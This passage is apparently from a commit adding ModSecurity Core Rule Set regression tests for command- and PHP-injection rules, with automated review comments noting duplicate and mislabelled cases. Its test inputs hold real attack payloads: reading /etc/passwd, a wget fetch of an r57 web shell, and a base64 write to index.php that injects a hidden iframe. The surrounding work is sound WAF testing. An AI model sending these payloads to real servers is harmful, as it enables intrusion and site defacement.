uri: /?host=www.google.com;cat+/etc/%24%7Ba%7Dpasswd
version: HTTP/1.0
output:
log_contains: id "932200"
-
test_title: 932200-3
desc: bash function
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?host=www.google.com;cat+/etc/%24%28echo%29passwd
version: HTTP/1.0
output:
log_contains: id "932200"
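Review bot: All three cases in this file assert `log_contains: id "932200"`, so nothing here would catch the rule starting to fire on benign traffic. A fourth test with an ordinary request, for example `uri: /?host=www.google.com` with `no_log_contains: id "932200"`, would pin the false-positive side. The same gap is visible in the 933100, 933120, 933140 and 933170 files in this commit, which contain only positive cases.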


@@ -0,0 +1,53 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 933100.yaml
tests:
-
test_title: 933100-1
desc: PHP Injection Attack (933100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /?foo=<?exec('wget%20http://r57.biz/r57.txt%20-O
version: HTTP/1.0
output:
log_contains: id "933100"
-
test_title: 933100-2
desc: PHP Injection Attack (933100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /?foo=%3C%3Fphp%20echo(%5C%22KURWA%5C%22)%3B%20file_put_contents(%5C%22.%2Findex.php%5C%22%2C%20base64_decode(%5C%22Pz48aWZyYW1lIHNyYz0iaHR0cDovL3p1by5wb2Rnb3J6Lm9yZy96dW8vZWxlbi9pbmRleC5waHAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT48P3BocA%3D%3D%5C%22)%2C%20FILE_APPEND)%3B%20%3F%3E
version: HTTP/1.0
output:
log_contains: id "933100"


@@ -0,0 +1,350 @@
---
meta:
author: lifeforms
description: None
enabled: true
name: 933110.yaml
tests:
-
test_title: 933110-1
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
output:
no_log_contains: id "933110"
-
test_title: 933110-2
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-Filename: a.php
port: 80
uri: /upload1
output:
log_contains: id "933110"
-
test_title: 933110-3
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X_Filename: a.php
port: 80
uri: /upload2
output:
log_contains: id "933110"
-
test_title: 933110-4
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-File-Name: a.php
port: 80
uri: /upload3
output:
log_contains: id "933110"
-
test_title: 933110-5
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-Filename: a.php..
port: 80
uri: /upload4
output:
log_contains: id "933110"
-
test_title: 933110-6
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-Filename: a.phtml
port: 80
uri: /upload
output:
log_contains: id "933110"
-
test_title: 933110-7
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-File-Name: fda.phtml......
port: 80
uri: /upload
output:
log_contains: id "933110"
-
test_title: 933110-8
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-File-Name: fda.php5
port: 80
uri: /upload
output:
log_contains: id "933110"
-
test_title: 933110-9
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-File-Name: fda.php5
port: 80
uri: /upload
output:
log_contains: id "933110"
-
test_title: 933110-10
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-File-Name: fda.php7
port: 80
uri: /upload
output:
log_contains: id "933110"
-
test_title: 933110-11
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
output:
no_log_contains: id "933110"
-
test_title: 933110-12
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-Filename: fda.php5...
port: 80
uri: /upload5
output:
log_contains: id "933110"
-
test_title: 933110-13
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X_Filename: fda.php5...
port: 80
uri: /upload6
output:
log_contains: id "933110"
-
test_title: 933110-14
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X_Filename: fthisfewfda.php.
port: 80
uri: /upload7
output:
log_contains: id "933110"
-
test_title: 933110-15
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-File-Name: fthi/sfewfda.php.............
port: 80
uri: /upload8
output:
log_contains: id "933110"
-
test_title: 933110-16
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-File-Name: fthi/sfewfda.php.............
port: 80
uri: /upload
output:
log_contains: id "933110"
-
test_title: 933110-17
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-File-Name: fthi/sfewfda.php907.............
port: 80
uri: /upload
output:
log_contains: id "933110"
-
test_title: 933110-18
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-Filename: fthi/sfewfda.phtml
port: 80
uri: /upload
output:
log_contains: id "933110"
-
test_title: 933110-19
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X_Filename: fthi/sfewfda.phtml987...
port: 80
uri: /
output:
no_log_contains: id "933110"
-
test_title: 933110-20
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X.Filename: a.php
port: 80
uri: /upload2
output:
log_contains: id "933110"
-
test_title: 933110-21
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X.Filename: fda.php5...
port: 80
uri: /upload6
output:
log_contains: id "933110"
-
test_title: 933110-22
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X.Filename: fthisfewfda.php.
port: 80
uri: /upload7
output:
log_contains: id "933110"
-
test_title: 933110-23
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X.Filename: fthi/sfewfda.phtml987...
port: 80
uri: /
output:
no_log_contains: id "933110"
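Review bot: Tests 933110-8 and 933110-9 are identical (`X-File-Name: fda.php5`, `uri: /upload`), and 933110-1 and 933110-11 are identical too, so two of the 23 cases add no coverage. Either drop the duplicates or give them a distinct input. Every case also carries the same `desc: PHP script uploads`, which makes a failing test hard to interpret. A per-case description such as `desc: X-File-Name with .php5 extension` would name the header form and extension under test.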


@@ -0,0 +1,24 @@
---
meta:
author: "Christian S.J. Peron"
description: None
enabled: true
name: 933120.yaml
tests:
-
test_title: 933120-1
desc: "PHP Injection Attack: Configuration Directive"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
Cache-Control: "no-cache, no-store, must-revalidate"
method: POST
port: 80
data: "var=session.bug_compat_42%3dtrue"
version: HTTP/1.0
output:
log_contains: id "933120"


@@ -0,0 +1,91 @@
---
meta:
author: csanders-git
description: Tests functionality of 933130
enabled: true
name: 933130.yaml
tests:
-
test_title: 933130-1
desc: Basic Request nothing should trigger
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
output:
no_log_contains: id "933130"
-
test_title: 933130-2
desc: Trigger a basic request
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=$_SERVER['test'];
output:
log_contains: id "933130"
-
test_title: 933130-3
desc: Non-Server Request
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=$_SE%20RVER['test'];
output:
no_log_contains: id "933130"
-
test_title: 933130-4
desc: SERVER request URLEncoded
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=$_%53ERVER['test'];
output:
log_contains: id "933130"
-
test_title: 933130-5
desc: SERVER request URLEncoded
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?%24_COOKIE=value;
output:
log_contains: id "933130"
-
test_title: 933130-6
desc: SERVER index listed with obfuscated SERVER
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=$_%53%20ERVER['request_uri'];
output:
no_log_contains: id "933130"
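Review bot: The description of 933130-5 does not match its input: `desc: SERVER request URLEncoded` is copied from 933130-4, but the request sent is `uri: /?%24_COOKIE=value;`. That case exercises an encoded `$_COOKIE` used as a parameter name, so `desc: URL-encoded $_COOKIE as parameter name` would say what is being checked. Test 933131-2 in the next file has the same mismatch.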


@@ -0,0 +1,49 @@
---
meta:
author: csanders-git
description: Tests functionality of stricter sibling 933131
enabled: true
name: 933131.yaml
tests:
-
test_title: 933131-1
desc: SERVER request URLEncoded
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=$_%53ERVER['test'];
output:
no_log_contains: id "933131"
-
test_title: 933131-2
desc: SERVER request URLEncoded
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?%24_COOKIE=value;
output:
no_log_contains: id "933131"
-
test_title: 933131-3
desc: SERVER index listed with obfuscated SERVER
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=$_%53%20ERVER['REQUEST_URI'];
output:
log_contains: id "933131"


@@ -0,0 +1,24 @@
---
meta:
author: "Christian S.J. Peron"
description: None
enabled: true
name: 933140.yaml
tests:
-
test_title: 933140-1
desc: "PHP Injection Attack: I/O Stream"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
Cache-Control: "no-cache, no-store, must-revalidate"
method: POST
port: 80
data: "var=php://stdout"
version: HTTP/1.0
output:
log_contains: id "933140"


@@ -0,0 +1,239 @@
---
meta:
author: lifeforms
description: None
enabled: true
name: 933150.yaml
tests:
-
test_title: 933150-1
desc: pmf
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /base64_decode
output:
log_contains: id "933150"
-
test_title: 933150-2
desc: base64_decode
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /base64_decode
output:
log_contains: id "933150"
-
test_title: 933150-3
desc: base64_decode
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?base64_deCOde
output:
log_contains: id "933150"
-
test_title: 933150-4
desc: base64_decode
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?foo=bzdecomprEss
output:
log_contains: id "933150"
-
test_title: 933150-5
desc: base64_decode
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?foo=FOOcall_user_func
output:
log_contains: id "933150"
-
test_title: 933150-6
desc: fsockopen
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?foo=FOOcall_user_func
output:
log_contains: id "933150"
-
test_title: 933150-7
desc: gzdecode
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?foo=FOOcall_user_func
output:
log_contains: id "933150"
-
test_title: 933150-8
desc: GzInFlAtE
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?foo=FOOcall_user_func
output:
log_contains: id "933150"
-
test_title: 933150-9
desc: GzInFlAtE
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?foo=FOOcall_user_func
output:
log_contains: id "933150"
-
test_title: 933150-10
desc: GzInFlAtE
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?I%20don%27t%20like%20gzuncompress
output:
log_contains: id "933150"
-
test_title: 933150-11
desc: GzInFlAtE
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?bar=pfsockopen%28%27foo%27%2C%2025%29
output:
log_contains: id "933150"
-
test_title: 933150-12
desc: posix_getpwuiD
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?bar=pfsockopen%28%27foo%27%2C%2025%29
output:
log_contains: id "933150"
-
test_title: 933150-13
desc: posix_getpwuiD
stages:
- stage:
input:
data: Shell%5fexec=bla
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /
output:
log_contains: id "933150"
-
test_title: 933150-14
desc: ZlIb_DeCoDe
stages:
- stage:
input:
data: Shell%5fexec=bla
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /
output:
log_contains: id "933150"
-
test_title: 933150-15
desc: get_defined_functions
stages:
- stage:
input:
data: foo=get_defined_functions%28%29%5B0%5D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /
output:
log_contains: id "933150"
-
test_title: 933150-16
desc: get_defined_vars
stages:
- stage:
input:
data: foo=get_defined_vars%28%29%5B0%5D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /
output:
log_contains: id "933150"
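Review bot: Several cases here name one function in `desc` but send a different payload, so the named function is never tested. Tests 933150-5 to 933150-9 all send `uri: /?foo=FOOcall_user_func` under the descriptions base64_decode, fsockopen, gzdecode and GzInFlAtE; 933150-11 and -12 both send the pfsockopen URI; 933150-13 and -14 both send `data: Shell%5fexec=bla`. Each case should carry the keyword its description names, e.g. `uri: /?foo=fsockopen` for 933150-6, presumably what the original suite intended. The same repeated-input pattern shows up in the 933160 file (933160-8 to -18), the 933161 file (933161-2 to -4) and the 933170 file (933170-7 to -10 differ only in the path).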


@@ -0,0 +1,86 @@
---
meta:
author: lifeforms
description: None
enabled: true
name: 933151.yaml
tests:
-
test_title: 933151-1
desc: pmf + chain; must run test in PL2!
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /array_diff%20foo%20%28
output:
log_contains: id "933151"
-
test_title: 933151-2
desc: pmf + chain; must run test in PL2!
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?date_ADD%28%29
output:
log_contains: id "933151"
-
test_title: 933151-3
desc: non-dangorous PHP functions, removed to reduce FP
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=filemtime%28%24foo%29
output:
no_log_contains: id "933151"
-
test_title: 933151-4
desc: pmf + chain; must run test in PL2!
stages:
- stage:
input:
data: gethostbynamE(
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /gethost
output:
log_contains: id "933151"
-
test_title: 933151-5
desc: No peren after keyword
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=array_diff
output:
no_log_contains: id "933151"


@@ -0,0 +1,631 @@
---
meta:
author: lifeforms
description: None
enabled: true
name: 933160.yaml
tests:
-
test_title: 933160-1
desc: function call regexp
stages:
- stage:
input:
data: Shell%5fexec=bla
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=chr%28123%29
output:
log_contains: id "933160"
-
test_title: 933160-2
desc: function call regexp
stages:
- stage:
input:
data: foo=curl_iNit%28%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /
output:
log_contains: id "933160"
-
test_title: 933160-3
desc: function call regexp
stages:
- stage:
input:
data: eval($foo)
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /
output:
log_contains: id "933160"
-
test_title: 933160-4
desc: function call regexp
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /
output:
log_contains: id "933160"
-
test_title: 933160-5
desc: function call regexp
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=exec%0A%28%27bar%27%29
output:
log_contains: id "933160"
-
test_title: 933160-6
desc: function call regexp
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=FILE%0D%0A%28%29
output:
log_contains: id "933160"
-
test_title: 933160-7
desc: function call regexp
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=file_ExistS%20%28%0A%0A%29
output:
log_contains: id "933160"
-
test_title: 933160-8
desc: function call regexp
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
-
test_title: 933160-9
desc: '@ operator'
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
-
test_title: 933160-10
desc: func\t()
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
-
test_title: 933160-11
desc: func//comment\r\n ()
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
-
test_title: 933160-12
desc: 'func #comment\n ()'
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
-
test_title: 933160-13
desc: func#\n ()
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
-
test_title: 933160-14
desc: 'func \t #\n ()'
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
-
test_title: 933160-15
desc: func/*comment*/()
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
-
test_title: 933160-16
desc: func /*com*/ ()
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
-
test_title: 933160-17
desc: func \t/**/\t ()
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
-
test_title: 933160-18
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
-
test_title: 933160-19
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /strrev()
output:
log_contains: id "933160"
-
test_title: 933160-20
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /strREV%28%24x%29
output:
log_contains: id "933160"
-
test_title: 933160-21
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: ?x=eval%28chr%28112%29.chr%28104%29.chr%28112%29
output:
log_contains: id "933160"
-
test_title: 933160-22
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /eval(gzinflate(str_rot13(base64_decode("")
output:
log_contains: id "933160"
-
test_title: 933160-23
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /eval%28base64_decode%28%27JGNoZWNrID...
output:
log_contains: id "933160"
-
test_title: 933160-24
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: yt=eval%28%22echo+10000000000%2d245205634%3b%22%29%3b
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /
output:
log_contains: id "933160"
-
test_title: 933160-25
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: posix_getegid%28%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /getegid
output:
log_contains: id "933160"
-
test_title: 933160-26
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /print_r
output:
log_contains: id "933160"
-
test_title: 933160-27
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /astrrev()
output:
log_contains: id "933160"
-
test_title: 933160-28
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /strrev
output:
log_contains: id "933160"
-
test_title: 933160-29
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /strrev(
output:
log_contains: id "933160"
-
test_title: 933160-30
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=eval
output:
log_contains: id "933160"
-
test_title: 933160-31
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=the%20files%20%28yep%29
output:
log_contains: id "933160"
-
test_title: 933160-32
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=exec%20%28
output:
log_contains: id "933160"
-
test_title: 933160-33
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=executor%28%29
output:
log_contains: id "933160"
-
test_title: 933160-34
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=cheval%28%24foo%29
output:
log_contains: id "933160"
-
test_title: 933160-35
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=audi%6ffile%28%24foo%29
output:
log_contains: id "933160"
-
test_title: 933160-36
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=the%20system%20is%20down%28%29
output:
log_contains: id "933160"
-
test_title: 933160-37
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=ecosystem%28%29
output:
log_contains: id "933160"
-
test_title: 933160-38
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=systems%28%29
output:
log_contains: id "933160"
-
test_title: 933160-39
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
